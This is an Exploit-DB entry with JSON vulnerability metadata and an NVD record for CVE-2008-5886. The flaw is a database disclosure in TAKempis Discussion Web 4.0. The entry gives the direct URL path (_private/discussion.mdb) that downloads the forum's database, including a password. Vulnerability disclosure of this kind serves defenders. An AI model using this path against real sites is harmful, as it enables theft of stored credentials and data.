ID EDB-ID:7445
Type exploitdb
Reporter Pouya_Server
Modified 2008-12-14T00:00:00
Description
Discussion Web v4 Remote Database Disclosure Vulnerability. CVE-2008-5886. Webapps exploit for asp platform
#########################################################
---------------------------------------------------------
Portal Name: Discussion Web
Version : 4.0
Vendor : http://www.takempis.com/aboutdiscussion.htm
Author : Pouya_Server , Pouya.s3rver@Gmail.com
Vulnerability : (DD)
---------------------------------------------------------
#########################################################
[DD]:
http://site.com/[Path]/_private/discussion.mdb
---------------------------------
# milw0rm.com [2008-12-14]
{"id": "EDB-ID:7445", "type": "exploitdb", "bulletinFamily": "exploit", "title": "Discussion Web 4 - Remote Database Disclosure Vulnerability", "description": "Discussion Web v4 Remote Database Disclosure Vulnerability. CVE-2008-5886. Webapps exploit for asp platform", "published": "2008-12-14T00:00:00", "modified": "2008-12-14T00:00:00", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}, "href": "https://www.exploit-db.com/exploits/7445/", "reporter": "Pouya_Server", "references": [], "cvelist": ["CVE-2008-5886"], "lastseen": "2016-02-01T02:14:17", "viewCount": 4, "enchantments": {"score": {"value": 5.6, "vector": "NONE", "modified": "2016-02-01T02:14:17", "rev": 2}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2008-5886"]}], "modified": "2016-02-01T02:14:17", "rev": 2}, "vulnersScore": 5.6}, "sourceHref": "https://www.exploit-db.com/download/7445/", "sourceData": "#########################################################\r\n---------------------------------------------------------\r\nPortal Name: Discussion Web\r\nVersion : 4.0\r\nVendor : http://www.takempis.com/aboutdiscussion.htm\r\nAuthor : Pouya_Server , Pouya.s3rver@Gmail.com\r\nVulnerability : (DD)\r\n---------------------------------------------------------\r\n#########################################################\r\n[DD]:\r\nhttp://site.com/[Path]/_private/discussion.mdb\r\n\r\n---------------------------------\r\n\r\n# milw0rm.com [2008-12-14]\r\n", "osvdbidlist": ["51550"]}
{"cve": [{"lastseen": "2021-02-02T05:35:19", "description": "TAKempis Discussion Web 4.0 stores sensitive information under the web root with insufficient access control, which allows remote attackers to download the database file containing a password via a direct request for _private/discussion.mdb. NOTE: some of these details are obtained from third party information.", "edition": 4, "cvss3": {}, "published": "2009-01-12T20:00:00", "title": "CVE-2008-5886", "type": "cve", "cwe": ["CWE-264"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2008-5886"], "modified": "2017-09-29T01:32:00", "cpe": ["cpe:/a:takempis:discussion_web:4.0"], "id": "CVE-2008-5886", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2008-5886", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}, "cpe23": ["cpe:2.3:a:takempis:discussion_web:4.0:*:*:*:*:*:*:*"]}]}
